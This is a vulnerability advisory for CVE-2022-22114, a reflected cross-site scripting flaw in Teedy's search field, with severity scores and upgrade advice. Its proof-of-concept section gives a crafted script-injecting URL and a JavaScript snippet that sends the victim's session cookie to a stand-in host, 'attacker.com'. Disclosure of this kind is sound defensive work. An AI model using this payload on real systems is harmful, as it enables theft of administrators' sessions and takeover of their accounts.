icon

We found results for “

CVE-2022-22114

Date: January 10, 2022

Overview

In Teedy, versions v1.5 through v1.9 are vulnerable to Reflected Cross-Site Scripting (XSS). The “search term" search functionality is not sufficiently sanitized while displaying the results of the search, which can be leveraged to inject arbitrary scripts. These scripts are executed in a victim’s browser when they enter the crafted URL. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account Takeover of the administrator, by an unauthenticated attacker.

Details

There is a Reflected Cross-Site Scripting vulnerability in “Teedy” application in the search field. The “search term" is not sufficiently sanitized while displaying the results of the search, as the search term can be provided via URL fragment which allows JavaScript to be inserted in the URL. Since “HttpOnly” is set to “false” on the cookies, this can lead to taking over the victim's session by extracting the session key and sending it to an attacker-controlled domain.

PoC Details

Create a file “x.js” with a malicious javascript code and run a simple python server to host it. For demonstration purposes, we will run the python server on top of “xss.tst” domain.
Run a different server, “attacker.com”, listening on port 9999 to capture the cookies from the executed malicious javascript.
As the admin, paste the malicious URL in the browser and hit enter to refresh the page and notice that XSS is triggered and the cookies are sent to the attackers' server.
As the attacker, you can now use the Administrator’s cookies to take over their account.

PoC Code

// Malicious URL the admin clicks on:
http://vulnerable.teedy.com:8080/#/document/search/%3Cscript~2Fsrc=~2F~2Fxss.tst~2Fx.js%3E%3C~2Fscript%3E

// x.js file contents hosted on xss.tst server:
alert(document.cookie);
fetch('http://attacker.com:9999/cookies= '+ document.cookie);

Affected Environments

Teedy v1.5 through v1.9

Prevention

Update to Teedy v1.10

Language: Java

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version v1.10

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: